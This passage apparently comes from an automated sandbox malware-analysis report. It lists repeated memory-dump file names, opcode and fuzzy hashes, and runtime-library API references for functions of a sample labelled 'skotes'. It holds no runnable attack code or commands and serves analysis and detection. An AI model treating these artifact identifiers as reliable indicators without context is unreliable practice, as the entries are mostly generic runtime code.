Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID:
API String ID: 1635606685-0
Opcode ID: 82dd757844f08593e8e8bb30290bebbbb61e85a11850916f82b1d04f0da54d9f
Instruction ID: 5befc654f534a70e3c324203b247cef250298eb1232adc9863a63b955cd36ff2
Opcode Fuzzy Hash: 82dd757844f08593e8e8bb30290bebbbb61e85a11850916f82b1d04f0da54d9f
Instruction Fuzzy Hash: 9D81A072D002569BDF25AEA48881EEE7BB99F49314F194159E818BF381E736CC44CBA1

Function 0097504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00975115
___AdjustPointer.LIBCMT ref: 00975138
___AdjustPointer.LIBCMT ref: 009751D4

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 8f7363f84a4bcff5e40e7ba9cfcf28bf51380abda259d962bf3d3fd513e13ddc
Instruction ID: f6d532873b97172f327acde8e4e98d1747cc1cbde3a9eae82d51383499670657
Opcode Fuzzy Hash: 8f7363f84a4bcff5e40e7ba9cfcf28bf51380abda259d962bf3d3fd513e13ddc
Instruction Fuzzy Hash: 6B510373609A06AFDB698F14D841B7AB3A8EF90311F56C52DE80D872A1E7B1ED40C790

Function 00974C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00974C66
TypeidsEqual.LIBVCRUNTIME ref: 00974C8B
PMDtoOffset.LIBCMT ref: 00974CA1
PMDtoOffset.LIBCMT ref: 00974D22

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: 0ef968d0dc221131de88aa806ed081670450e73a9dbdc5864b8ca9277a497111
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 9F51A036A042099FDF21CF68C4806EEFBF9EF55354F14849AE898A7392D772AD05CB50

Function 0096DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0096DB64

Part of subcall function 00968F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00968F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0096DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0096DBE9
Concurrency::location::_Assign.LIBCMT ref: 0096DC56

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: 5b842d33a2cc2129a5ff16cbc37816eb74d82635b530d8e5dd2069b6adec1964
Instruction ID: c996c5f1b7f3f062073a5baedd28d454b1ba697127a7cad6890f8f0c208d4f56
Opcode Fuzzy Hash: 5b842d33a2cc2129a5ff16cbc37816eb74d82635b530d8e5dd2069b6adec1964
Instruction Fuzzy Hash: 71410570B05214ABCF19DB24C886BBDBB79AF85310F04409DE5569B3C2CB74AD45CB91

Function 009656AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 009656F2
_InternalDeleteHelper.LIBCONCRT ref: 00965726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0096578B
SafeRWList.LIBCONCRT ref: 0096579A

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
